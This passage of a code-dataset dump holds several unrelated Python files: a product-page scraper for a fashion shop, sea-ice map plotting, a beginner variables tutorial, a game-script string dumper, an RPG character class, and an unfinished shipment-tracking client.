consist + \":%s\" % consist_text\r\n item[\"consist\"] = consist\r\n\r\n # ------description------\r\n\r\n item[\"description\"] = response.xpath(\"string(//div[@class='content'])\").extract()[0]\r\n\r\n # ------brand------\r\n\r\n item[\"brand\"] = \"Madeleine:http://pro-allegro.by/images/logo/madeleine.png\"\r\n\r\n # ------images360 and video_url------\r\n\r\n item[\"images360\"] = \"\"\r\n item[\"video_url\"] = \"\"\r\n\r\n s360 = response.xpath(\"string(//script[contains(text(), '_Article360ViewUrl')])\").extract()[0]\r\n if s360:\r\n m = re.search('zoompopup_fg\\.php\\?id=(\\d+)&', s360)\r\n urls = \"\"\r\n if m:\r\n for i in range(1, 25):\r\n if i < 10:\r\n idx = \"0%d\" % i\r\n else:\r\n idx = \"%d\" % i\r\n urls = urls + \"http://madeleine.scoopzoom.de/img/360/%s/%s.jpg,\" % (m.group(1), idx)\r\n item[\"images360\"] = urls[:-1]\r\n\r\n m = re.search('_ArticleVideoViewUrl = \"(.*)\"', s360)\r\n if m:\r\n item[\"video_url\"] = m.group(1)\r\n\r\n # ------path_related------\r\n\r\n related_urls = response.xpath(\"//div[@id='tc-content300']/div/div/ul/li/a/@data-href\").extract()\r\n path_related = \"\"\r\n for related_url in related_urls:\r\n path_related = path_related + related_url[23:] + \",\"\r\n\r\n item[\"path_related\"] = path_related[:-1]\r\n\r\n # ------path_upsell------\r\n\r\n upsell_urls = response.xpath(\"//div[@id='mav2-outfit-list-ext']/div[@class='scroll']/ul/li/a/@href\").extract()\r\n path_upsell = \"\"\r\n for upsell_url in upsell_urls:\r\n path_upsell = path_upsell + upsell_url + \",\"\r\n\r\n item[\"path_upsell\"] = path_upsell[:-1]\r\n\r\n # ------breadcrumbs------\r\n\r\n google_tag_params = response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var google_tag_params =')], '%s'), '%s')\" % (\"pcat: \", \", \")).extract()[0]\r\n breadcrumbs_list = google_tag_params[1:-1].split(\",\")\r\n breadcrumbs_list.reverse()\r\n\r\n breadcrumbs = \", \".join(breadcrumbs_list)\r\n item[\"breadcrumbs\"] = breadcrumbs\r\n\r\n # ------id_supplier------\r\n\r\n item[\"id_supplier\"] = \"000000002\"\r\n\r\n # ------sizes------\r\n\r\n sizes = \"\"\r\n\r\n productData = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var productData=')], 'var productData='), ';')\").extract()[0])\r\n kdbnrSxData = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var kdbnrSxData=')], 'var kdbnrSxData='), ';')\").extract()[0])\r\n articleData = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var articleData=')], 'var articleData='), ';')\").extract()[0])\r\n availabilityTextLookUp = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var availabilityTextLookUp=')], 'var availabilityTextLookUp='), ';')\").extract()[0])\r\n\r\n #print \"!!!!!\", response.body_as_unicode()\r\n\r\n sizes_in_tabs = []\r\n tabs_names = []\r\n\r\n sizes_cont = response.xpath(\"//div[@id='sizeParent']/div\")\r\n\r\n tabs = sizes_cont.xpath(\"div/ul/li[contains(@id, 'tc-tab')]\")\r\n\r\n for tab in tabs:\r\n if tab.xpath(\"span[@class='st-icon']\"):\r\n tabs_names.append([tab.xpath(\"string(span[@class='st-icon'])\").extract()[0], tab.xpath(\"string(span[@class!='st-icon'])\").extract()[0]])\r\n else:\r\n tabs_names.append([\"\", tab.xpath(\"string(span)\").extract()[0]])\r\n num_tab = tab.xpath(\"substring-after(@id, 'tc-tab')\").extract()[0]\r\n\r\n sizes_x = sizes_cont.xpath(\"div[@id='tc-content%s']/div/div/div\" % num_tab)\r\n\r\n sizes_names = []\r\n\r\n for size_x in sizes_x:\r\n sizes_names.append(\"\".join(size_x.xpath(\"string(.)\").extract()))\r\n sizes_in_tabs.append(sizes_names)\r\n\r\n for article in articleData.keys():\r\n sizes = sizes + \"%s:\" % article\r\n for i, tab_name in enumerate(tabs_names):\r\n sizes = sizes + \"%s:%s::\" % (tab_name[0], tab_name[1])\r\n for size in sizes_in_tabs[i]:\r\n size_c = re.sub(\"[,/\\s+]\", \"\", size)\r\n for size_data in articleData[article]:\r\n if size_data[0] == size_c:\r\n if size_data[2] == 3 or size_data[2] == 6:\r\n sizes = sizes + \"!%s|\" % size\r\n else:\r\n sizes = sizes + \"%s|\" % size\r\n sizes = sizes + \"%s^\" % availabilityTextLookUp[\"%d\" % size_data[2]]\r\n break\r\n sizes = sizes[:-1] + \";\"\r\n sizes = sizes[:-1] + \"#\"\r\n\r\n item[\"sizes\"] = sizes[:-1]\r\n\r\n # ------price and old_price------\r\n\r\n price = \"\"\r\n\r\n for article in productData.keys():\r\n for i, tab_name in enumerate(tabs_names):\r\n for size in sizes_in_tabs[i]:\r\n size_c = re.sub(\"[,/\\s+]\", \"\", size)\r\n if productData[article][\"Sizes\"].get(size_c) == None:\r\n continue\r\n size_data = productData[article][\"Sizes\"][size_c]\r\n\r\n price = price + \"%s:\" % article\r\n price = price + \"%s:\" % tab_name[1]\r\n price = price + \"%s:\" % size\r\n price = price + \"%s:\" % size_data[\"Price\"].replace(\",\", \".\")\r\n\r\n if size_data[\"SalePrice\"] == None:\r\n price = price + \"N;\"\r\n else:\r\n price = price + \"%s;\" % size_data[\"SalePrice\"].replace(\",\", \".\")\r\n if not tabs_names:\r\n size_data = productData[article][\"Sizes\"][\"ohne\"]\r\n\r\n price = price + \"%s:::%s:\" % (article, size_data[\"Price\"].replace(\",\", \".\"))\r\n\r\n if size_data[\"SalePrice\"] == None:\r\n price = price + \"N;\"\r\n else:\r\n price = price + \"%s;\" % size_data[\"SalePrice\"].replace(\",\", \".\")\r\n\r\n item[\"price\"] = price[:-1]\r\n\r\n # ------images------\r\n\r\n images = \"\"\r\n\r\n general_image = response.xpath(\"string(//meta[@property='og:image']/@content)\").extract()[0]\r\n if general_image:\r\n url_l = general_image.split(\"_\")\r\n url_l[1] = \"0\"\r\n url_l[2] = \"0\"\r\n url_l[3] = \"0\"\r\n url_l[4] = \"0\"\r\n general_image = \"_\".join(url_l)\r\n\r\n images = \"%s;\" % general_image\r\n\r\n imgToKdbnrsx_text = response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var imgToKdbnrsx=')], 'var imgToKdbnrsx='), ';')\").extract()[0].replace(\"'\", \"\\\"\")\r\n\r\n if imgToKdbnrsx_text:\r\n imgToKdbnrsx = json.loads(imgToKdbnrsx_text, object_pairs_hook=collections.OrderedDict)\r\n\r\n sizes_imgs = []\r\n\r\n pos = 0\r\n pos_end = 0\r\n while True:\r\n pos = response.body_as_unicode().find(\"ArticleZoom.addImage(\", pos_end)\r\n if pos == -1: break\r\n pos_end = response.body_as_unicode().find(\");\", pos)\r\n sizes_imgs.append(json.loads(response.body_as_unicode()[pos + 21:pos_end]))\r\n\r\n for article in kdbnrSxData.keys():\r\n url = kdbnrSxData[article][\"Url\"]\r\n url_l = url.split(\"_\")\r\n url_l[1] = \"0\"\r\n url_l[2] = \"0\"\r\n url_l[3] = \"0\"\r\n url_l[4] = \"0\"\r\n img_id = kdbnrSxData[article][\"ImageId\"]\r\n\r\n if imgToKdbnrsx:\r\n for img in imgToKdbnrsx.keys():\r\n if imgToKdbnrsx[img] == article:\r\n url = \"\"\r\n for s in sizes_imgs:\r\n if img == str(s[\"id\"]):\r\n url_l[5] = str(s[\"width\"])\r\n ur = url_l[6].split(\"/\")\r\n ur[0] = str(s[\"height\"])\r\n url_l[6] = \"/\".join(ur)\r\n url = \"_\".join(url_l)\r\n\r\n images = images + \"%s:%s;\" % (article, url.replace(img_id, img))\r\n else:\r\n images = images + \"%s:%s\" % (article, url)\r\n\r\n else:\r\n for article in kdbnrSxData.keys():\r\n url = kdbnrSxData[article][\"Url\"]\r\n item[\"images\"] = images[:-1]\r\n\r\n # ------colors------\r\n\r\n colors_groups = dict()\r\n\r\n for article in productData.keys():\r\n colors_group = productData[article][\"ColorFamilyName\"]\r\n article_color = [article, productData[article][\"ColorName\"], \"http://a2.madcdn.net/img/cache/colors/%d.jpg\" % productData[article][\"ColorId\"]]\r\n if colors_groups.get(colors_group) == None:\r\n colors_groups[colors_group] = []\r\n colors_groups[colors_group].append(article_color)\r\n\r\n request = Request(url=\"http://www.madeleine.de/suche/ihre-suche-%s/\" % productData.keys()[0], callback=self.parse_themes)\r\n request.meta['item'] = item\r\n request.meta['colors_groups'] = colors_groups\r\n\r\n return request\r\n\r\n\r\n def parse_themes(self, response):\r\n item = response.meta['item']\r\n colors_groups = response.meta['colors_groups']\r\n\r\n themes = response.xpath(\"//div[@class='sf_items sf_colors'][2]/ul/li/@title\").extract()\r\n\r\n item[\"themes\"] = \",\".join(themes)\r\n\r\n if colors_groups.get('varies') != None:\r\n colors_groups[\"varies_res\"] = list(colors_groups[\"varies\"])\r\n colors = []\r\n colors_x = response.xpath(\"//div[@class='sf_items sf_colors'][1]/ul/li\")\r\n for color_x in colors_x:\r\n colors.append([color_x.xpath(\"@title\").extract()[0], color_x.xpath(\"substring-after(a/@href, '=')\").extract()[0]])\r\n\r\n\r\n color = colors.pop(0)\r\n request = Request(url=\"http://www.madeleine.de%s?cf=%s\" % (item[\"path\"], color[1]) , callback=self.find_colors)\r\n request.meta['item'] = item\r\n request.meta['colors_groups'] = colors_groups\r\n request.meta['cur_color'] = color[0]\r\n request.meta['colors'] = colors\r\n\r\n return request\r\n else:\r\n item[\"colors\"] = self.make_colors(colors_groups)\r\n self.check_item(item)\r\n return item\r\n\r\n def find_colors(self, response):\r\n item = response.meta['item']\r\n colors_groups = response.meta['colors_groups']\r\n cur_color = response.meta['cur_color']\r\n colors = response.meta['colors']\r\n\r\n varies = colors_groups.get(\"varies\")\r\n\r\n if not response.xpath(\"//body[contains(@class, 'tab-invalidlink')]\"):\r\n #article = response.xpath(\"string(//span[@id='orderNo'])\").extract()[0].replace(' ', '')\r\n img_id = response.xpath(\"substring-after(//img[contains(@id, 'mainImage')]/@id, '-')\").extract()[0]\r\n\r\n kdbnrSxData = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var kdbnrSxData=')], 'var kdbnrSxData='), ';')\").extract()[0])\r\n\r\n for i, color in enumerate(varies):\r\n if kdbnrSxData.get(color[0])[\"ImageId\"] == img_id:\r\n col = varies[i]\r\n\r\n for j, color_var in enumerate(colors_groups['varies_res']):\r\n if (color_var[0] == varies[i][0]):\r\n colors_groups['varies_res'].pop(j)\r\n if colors_groups.get(cur_color) == None:\r\n colors_groups[cur_color] = []\r\n colors_groups[cur_color].append(col)\r\n break\r\n\r\n if colors:\r\n color = colors.pop(0)\r\n request = Request(url=\"http://www.madeleine.de%s?cf=%s\" % (item[\"path\"], color[1]) , callback=self.find_colors)\r\n request.meta['item'] = item\r\n request.meta['colors_groups'] = colors_groups\r\n request.meta['cur_color'] = color[0]\r\n request.meta['colors'] = colors\r\n return request\r\n else:\r\n item[\"colors\"] = self.make_colors(colors_groups)\r\n self.check_item(item)\r\n return item\r\n\r\n def make_colors(self, colors_groups):\r\n result = \"\"\r\n\r\n for group in colors_groups.keys():\r\n if group == \"varies\":\r\n continue\r\n\r\n if not colors_groups[group]:\r\n continue\r\n\r\n #if group == \"varies_res\" and colors_groups['varies_res']:\r\n # result = result + \"::\"\r\n #else:\r\n result = result + \"%s::\" % group\r\n\r\n for color in colors_groups[group]:\r\n result = result + \"%s:%s:%s,\" % (color[1], color[0], color[2])\r\n result = result[:-1] + \";\"\r\n\r\n return result[:-1]\r\n\r\n def check_item(self, item):\r\n for i, key in enumerate(item.keys()):\r\n if item.get(key) != None:\r\n if item[key]:\r\n self.check_values[i] = 1\r\n\r\n def result_check(self):\r\n result = True\r\n for v in self.check_values:\r\n if v == 0:\r\n result = False\r\n return result\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"madeleine/src/spiders/madeleinespider.py","file_name":"madeleinespider.py","file_ext":"py","file_size_in_byte":23066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"392797711","text":"#可視化\nfrom mpl_toolkits.basemap import Basemap\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\nimport calc_data\n\ng = np.arange(0,145,1)\npoints = np.meshgrid(g, g)\n\n#####################################################################\n#Basemapによる地図投影\n\ndef visual_map(data, mode, submode, save_name, show):\n\t\"\"\"\n\t風力係数、偏角、相関係数などの可視化\n\tdata: regression data\n\tmode:\n\t\t0: 1 data\n\t\t1: >2 data\n\t\t2: ic0_900\n\t\"\"\"\n\tlon, lat = calc_data.get_lonlat(latlon145_file_name, array=True)\n\tlonlat_data = [lon, lat]\n\n\tif mode == 0:\n\t\tif submode == \"w_speed\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"w_u\", \"w_v\", \"w_speed\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_wind\"\n\t\telif submode == \"iw_speed\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"iw_u\", \"iw_v\", \"iw_speed\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_wind\"\n\t\telif submode == \"real_iw_speed\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"real_iw_u\", \"real_iw_v\", \"real_iw_speed\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_wind\"\n\n\t\telif submode == \"A_by_day\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"A_by_day\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"theta_by_day\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"theta_by_day\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"ic0_145\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"ic0_145\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"A\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"A\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"angle\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"angle\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"coef\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"coef\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\n\t\tplot_2_map(data, data_type, lonlat_data, points)\n\n\telif mode == 1:\n\t\t#submode: [\"w_speed\", \"ic0_145\", ...]\n\t\tfor item in submode:\n\t\t\tvisual_map(data, mode=0, submode=item, \n\t\t\t\tlatlon145_file_name=lonlat_data, points=points, save_name=None, show=False)\n\telif mode == 2:\n\t\tic0_file_name, latlon900_file_name = data[0], data[1]\n\t\tplot_ic0_900(ic0_file_name, latlon900_file_name)\n\t\n\tif show == True:\n\t\tplt.show()\n\tif save_name is not None:\n\t\tplt.savefig(save_name, dpi=1200)\n\n\ndef plot_ic0_900(ic0_file_name, latlon900_file_name):\n\t#氷のIC0データの可視化(csvからの読み込み)\n\tdf0 = pd.read_csv(ic0_file_name, header=None)\n\tic0 = np.array(df0, dtype='float32')\n\tic0 = np.ma.masked_invalid(ic0)\n\tice_grid = np.reshape(ic0, (900,900))\n\t\n\tdf1 = pd.read_csv(latlon900_file_name, header=None)\n\tlatlon = np.array(df1, dtype='float32')\n\tx_lon = latlon[:,0]\n\ty_lat = latlon[:,1]\n\t\n\tm = Basemap(lon_0=180, boundinglat=40, resolution='i', projection='npstere')\n\tfig = plt.figure(figsize=(7,7))\n\t\n\t#グリッドの描画\n\t#m.plot(x_lon,y_lat,'bo', markersize=0.3)\n\txx = np.reshape(x_lon, (900,900))\n\tyy = np.reshape(y_lat, (900,900))\n\t\n\tm.drawcoastlines(color = '0.15')\n\tm.pcolormesh(xx, yy, ice_grid, cmap=plt.cm.jet)\n\tm.colorbar(location='bottom')\n\ndef plot_2_map(data, data_type, lonlat_data, points):\n\tlon, lat = lonlat_data[0], lonlat_data[1]\n\tm = Basemap(lon_0=180, boundinglat=50, resolution='i', projection='npstere')\n\tfig = plt.figure(figsize=(7, 7))\n\n\tx, y = m(lon, lat)\n\tx1 = np.reshape(x, (145,145), order='F')\n\ty1 = np.reshape(y, (145,145), order='F')\n\t\n\tm.drawcoastlines(color = '0.15')\n\n\tif data_type == \"type_wind\":\n\t\tdata[data.data_idx==0.] = np.nan\n\t\tvector_u = np.ma.masked_invalid(np.array(data.iloc[:,1]))\n\t\tvector_v = np.ma.masked_invalid(np.array(data.iloc[:,2]))\n\t\tvector_speed = np.ma.masked_invalid(np.array(data.iloc[:,3]))\n\n\t\t# 風の描画,visual_2から変更\n\t\tm.quiver(x, y, vector_u, vector_v, vector_speed)\n\t\t#m.quiver(x, y, vector_u, vector_v, vector_speed, angles='xy', scale_units='xy')\n\n\telif data_type == \"type_non_wind\":\n\t\tdata[data.data_idx==0.] = np.nan\n\t\tplot_data = np.array(data.iloc[:,1])\n\n\t\t#ここに微調整を書く\n\t\t#plot_data[plot_data>=0.05] = np.nan\n\t\t#plot_data = np.absolute(plot_data)\n\t\t#plot_data[(plot_data>50) | (plot_data<-50)] = np.nan\n\n\t\tplot_data = np.ma.masked_invalid(plot_data)\n\t\tplot_data1 = np.reshape(plot_data, (145,145), order='F')\n\t\t\n\t\tm.pcolormesh(x1, y1, plot_data1, cmap=plt.cm.jet)\n\t\tm.colorbar(location='bottom')\n\n\telse:\n\t\tplot_data = np.array(data.iloc[:,1])\n\t\tplot_data = np.ma.masked_invalid(plot_data)\n\t\tm.scatter(x, y, marker='o', color = \"b\", s=1.2, alpha=0.9)\n\n#############################################################################################\n#時系列ではないプロット\n\ndef visual_non_line(data, mode, save_name, show):\n\t\"\"\"\n\tある日の地衡風-海流速度と海氷流速の可視化\n\tcalc_dataのget_wind_ic0_regression_data関数から接続\n\tdata: calc_data.get_wind_ic0_regression_data(...)\n\t\"\"\"\n\t#modeの処理\n\tmode_1, mode_2 = mode[0], mode[1]\n\tdata = data.dropna()\n\t#print (data.head(3))\n\t\n\t#プロット\n\tsns.set_style(\"darkgrid\")\n\tif mode_1 == \"scatter\":\n\t\tx_data, y_data = data[mode_2[0]], data[mode_2[1]]\n\t\t#ここに必要な処理\n\n\t\tsns.jointplot(x=x_data, y=y_data, kind=\"reg\")\n\t\t#sns.regplot(x=x_data, y=y_data)\n\telif mode_1 == \"hist\":\n\t\tx_data = data[mode_2]\n\t\t#ここに必要な処理\n\n\t\tsns.distplot(x_data)\n\telif mode_1 == \"custom\":\n\t\tsns.distplot(data[\"A_by_day\"])\n\n\tif show == True:\n\t\tplt.show()\n\tif save_name is not None:\n\t\tplt.savefig(save_name, dpi=1200)\n\n#############################################################################################\n#時系列プロット\n\ndef visual_ts(data):\n\t\"\"\"\n\tDataFrame型のdataをプロットする\n\t[参考]\n\thttp://sinhrks.hatenablog.com/entry/2015/11/15/222543\n\t\"\"\"\n\t\n\t#普通の時系列プロット\n\t\t\n\ttmp = pd.to_datetime(data[\"date\"])\n\tdata[\"date\"] = data.index\n\tdata.index = tmp\n\tdata = data.rename(columns={'date': 'idx'})\n\t\n\t#data[[\"wind\", \"ice\"]].plot(figsize=(16,4), alpha=0.5)\n\t\"\"\"\n\tax = data.wind.plot(figsize=(16,4), ylim=(0, 30), color=\"blue\" )\n\tax2 = ax.twinx()\n\tdata.ice.plot( ax=ax2, ylim=(0, 0.8), color=\"red\" )\n\t\"\"\"\n\t\n\t\n\tplt.show()\n\t\n\t#時間軸が違う場合(share axis)\n\n\n\n\n#############################################################################################\t\n\n\n\n\n\n\n\n\n\n\n","sub_path":"visual/visual_3/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"441900243","text":"#variables for one of important thing in python\n#variables basically store values \n\n# example 1\n\nA=1\n\nprint (A)\n\n'''output'''\n\n# 1\n\n\n# example 2\n\nA=1\nB=2\n\nsum=A+B\n\nprint (sum)\n\n'''output'''\n# 3\n\n# example 3 storing a string value \n\nA='hi am dev bhattacharjee'\n\nprint (A) \n\n'''output'''\n\n# hi am dev bhattacharjee \n\n# example 4 printing multiple value using variable \n\nA='I am '\nF='dev bhattacharjee'\nG='Rahul Das'\n\nprint (A , F) #to print multiple value u must give a [ ,] between variable or string \nprint (A , G) #see how it save my time\n\n'''output'''\n\n# I am dev bhattacharjee \n# I am Rahul Das\n\n# example 5 cross changing value[basic / comman]\n\nA=1\nB=2\n\nC=A #her we said that A is equal to C or 1 is equal to C\nB=C #her we changed to value of B and now its 1\n\nprint (B)\n\n'''output'''\n\n# 1\n\n# example 6 cross changing value [ advance one]\n\nA=1\nB=2\n\nA,B=B,A #here we made A value is shifted to B and B value is shifted to A\n\nprint (B)\nprint (A)\n\n'''output'''\n\n# 1\n# 2\n\n'''now u can mobe forward to next topic'''\n\n","sub_path":"chapter1/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"506281570","text":"import os\nimport struct\nimport tools\nimport configparser\nfrom io import BytesIO\nfrom ctypes import create_string_buffer\n\n\ndef dump_bin(data: bytes) -> configparser.ConfigParser:\n data = BytesIO(data)\n config = configparser.ConfigParser()\n \n # Read offset of bin\n data.seek(0x10)\n bin_offset = struct.unpack(\">I\", data.read(4))[0]\n data.seek(bin_offset)\n end_offset = struct.unpack(\">I\", data.read(4))[0]\n data.seek(bin_offset)\n file_count = (end_offset - bin_offset) // 4\n\n # Read strings\n dumped = []\n for file in range(file_count):\n offset = struct.unpack(\">I\", data.read(0x04))[0]\n next_offset = data.tell()\n if offset == 0x00:\n break\n data.seek(offset)\n \n # Extract string\n string = b\"\"\n while True:\n byte = data.read(1)\n if byte == b\"\\x00\":\n break\n string += byte\n dumped.append(string.decode(\"cp932\"))\n\n # Go to next offset\n data.seek(next_offset)\n \n # Get file size\n data.seek(0, 2)\n file_size = data.tell()\n\n config[\"data\"] = {\n \"offset\": bin_offset,\n \"size\": file_size - bin_offset,\n \"translated\": 0\n }\n config[\"strings\"] = {}\n\n for i, string in enumerate(dumped, start=1):\n config[\"strings\"][f\"string{i}\"] = string\n\n data.close()\n return config\n\n\ndef dump_scripts(script_path: str):\n files = tools.extract_cat(script_path)\n os.makedirs(os.path.join(\"scripts\", \"npg11\"), exist_ok=True)\n for i, file in enumerate(files):\n with open(os.path.join(\"scripts\", \"npg11\", f\"{i}.ini\"), \"w\", encoding=\"cp932\") as f:\n config = dump_bin(file)\n config.write(f)\n print(f\"Extracted {i}\")\n\n\nif __name__ == \"__main__\":\n dump_scripts(\"script/script.cat\")\n","sub_path":"dump_scripts.py","file_name":"dump_scripts.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504342233","text":"from math import log2\n\nfrom enums.Attributes import Attributes\nfrom enums.Stats import Stats\nfrom model.Equipment import Equipment\n\n\nclass Character:\n EQUIPMENT_SLOTS = 5\n ITEM_STORAGE = 20\n\n def __init__(self, character_name):\n self.exp = 0\n self.max_life = 0\n self.available_points = 10\n self.base_stats = dict()\n self.character_stats = dict()\n self.character_name = character_name\n self.worn_equipment = []\n self.character_inventory = []\n self.character_level = 100\n self._init_worn_equip_and_stats()\n self.calculate_full_stats()\n\n def allocate_points(self, amount, stat):\n self.base_stats[stat] += amount\n if self.available_points >= amount:\n self.available_points -= amount\n self.base_stats[stat] += amount\n return True\n return self.available_points\n\n def _init_worn_equip_and_stats(self):\n for slot in range(self.EQUIPMENT_SLOTS):\n self.worn_equipment += [None]\n for full_stat in list(Stats) + list(Attributes):\n self.character_stats[full_stat] = 0\n for stat in list(Stats):\n self.base_stats[stat] = 5\n self.character_stats[stat] = 5\n return\n\n def store_item(self, equipment):\n if len(self.character_inventory) >= self.ITEM_STORAGE:\n return False\n else:\n self.character_inventory += [equipment]\n return True\n\n def drop_item(self, equipment):\n for item in self.character_inventory:\n if item == equipment:\n self.character_inventory.remove(equipment)\n return True\n return False\n\n def equip_item(self, equipment):\n slots = equipment.get_equipment_type().value[1]\n if isinstance(slots, tuple) and self.worn_equipment[1] is not None and self.worn_equipment[0] is not None and len(\n self.character_inventory) > self.ITEM_STORAGE - 2:\n return False\n self.drop_item(equipment)\n if isinstance(slots, tuple):\n for slot in list(slots):\n if self.worn_equipment[slot] is not None:\n self.store_item(self.worn_equipment[slot])\n self.worn_equipment[slot] = None\n self.worn_equipment[int(slots[0])] = equipment\n else:\n if self.worn_equipment[slots] is not None:\n self.store_item(self.worn_equipment[slots])\n self.worn_equipment[int(slots)] = equipment\n\n self.calculate_full_stats()\n return True\n\n def __str__(self):\n return \"%s level: %d\" % (self.character_name, self.character_level)\n\n def unequip_item(self, equipment):\n if len(self.character_inventory) < self.ITEM_STORAGE:\n self.character_inventory.append(equipment)\n self.worn_equipment[equipment.get_equipment_type().value[1]] = None\n self.calculate_full_stats()\n return True\n return False\n\n def calculate_full_stats(self):\n for full_stat in list(Stats) + list(Attributes):\n self.character_stats[full_stat] = 0\n\n for stat in self.base_stats:\n self.character_stats[stat] += self.base_stats[stat]\n for item in self.worn_equipment:\n if item is not None:\n for stat in item.get_stats():\n self.character_stats[stat] += item.get_stats()[stat][1]\n\n self.calculate_life()\n return True\n\n def calculate_life(self):\n life = 500 + self.character_level * 5 + (\n (self.character_stats[Stats.Stamina]) * log2(1 + self.character_level)) + log2(\n self.character_stats[Stats.Strength]) * self.character_level\n life += self.character_stats[Attributes.life]\n self.max_life = int(life)\n\n def get_stats(self):\n return_list = dict()\n for stat in self.character_stats:\n if self.character_stats[stat] != 0:\n return_list[stat] = self.character_stats[stat]\n return return_list\n\n def encrypt(self):\n encrypt = self.encrypt_name() + str(chr(0))\n encrypt += '0x%04X' % self.available_points + str(chr(0))\n encrypt += '0x%02X' % self.character_level + str(chr(0))\n for stat in self.base_stats:\n encrypt += chr(stat.value[0] + 65)\n encrypt += '0x%04X' % self.base_stats[stat] + str(chr(0))\n for item in self.worn_equipment:\n if item is None:\n encrypt += str(chr(1))\n else:\n encrypt += item.encrypt()\n encrypt += chr(0)\n for item in self.character_inventory:\n encrypt += item.encrypt() + chr(0)\n return encrypt\n\n def decrypt(self, decryption_string):\n decrypt = decryption_string.split(chr(0))\n self.decrypt_name(decrypt[0])\n self.available_points = int(decrypt[1], 16)\n self.character_level = int(decrypt[2], 16)\n decrypt = decrypt[3:]\n for stat in range(len(list(Stats))):\n self.base_stats[Stats.get_stat(ord(decrypt[0][:1]))] = int(decrypt[0][1:], 16)\n decrypt = decrypt[1:]\n\n for item in range(self.EQUIPMENT_SLOTS):\n if decrypt[0] == chr(1):\n add = None\n else:\n add = Equipment()\n add.full_import(decrypt[0])\n\n self.worn_equipment[item] = add\n decrypt = decrypt[1:]\n for item in range(len(decrypt) - 1):\n add = Equipment()\n add.full_import(decrypt[0])\n self.worn_equipment[item] = add\n decrypt = decrypt[1:]\n return True\n\n def encrypt_name(self):\n encrypted_name = \"\"\n for char in self.character_name:\n encrypted_name += chr(ord(char) + 124)\n return encrypted_name\n\n def decrypt_name(self, name):\n encrypted_name = \"\"\n for char in name:\n encrypted_name += chr(ord(char) - 124)\n self.character_name = encrypted_name\n return encrypted_name\n","sub_path":"model/Character.py","file_name":"Character.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641212590","text":"from zeep import Client\nimport base64\nimport xml.etree.cElementTree as ET\nfrom xml.etree.ElementTree import tostring\nfrom util import *\n\n\ndef envioArticulosAmazon():\n print(\"envioArticulosAmazon\")\n cx = creaConexion()\n print(\"conectado\")\n # cx[\"cur\"].execute(\"SELECT nombre FROM eg_fichprocesados WHERE tipo = 'AZ_ENVIOARTICULOS'\")\n # rows = cx[\"cur\"].fetchall()\n # if len(rows) > 0:\n # return True\n\n print(\"sigue\")\n # cx[\"cur\"].execute(\"INSERT INTO eg_fichprocesados (estado,hora,tipo,nombre,fecha) VALUES ('En proceso',CURRENT_TIME,'AZ_ENVIOARTICULOS','AZ_ENVIOARTICULOS',CURRENT_DATE)\")\n # cx[\"conn\"].commit()\n\n try:\n cx[\"cur\"].execute(\"SELECT az.barcode AS barcode FROM az_articulospublicados az WHERE az.sincronizado = false and az.activo = true limit 1\")\n\n rows = cx[\"cur\"].fetchall()\n print(len(rows))\n barcode = False\n wsdl = 'https://clientes.mrw.es:4433/TrackingService.svc?wsdl'\n client = Client(wsdl)\n\n if len(rows) > 0:\n for q in rows:\n barcode = str(q[\"barcode\"])\n print(barcode)\n requestData = {\n 'Product': {\n 'SKU': barcode,\n 'StandardProductID': barcode,\n }\n }\n\n response = client.service.GetEnvios(**requestData)\n print(response)\n\n # if len(response.Seguimiento.Abonado) > 0:\n # if len(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento) > 0:\n # estadoEntregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].Estado)\n # descEstadoentregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].EstadoDescripcion)\n # fechaEntregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].FechaEntrega)\n # horaEntregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].HoraEntrega)\n # intentosentregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].Intentos)\n # personaEntregaMrw = 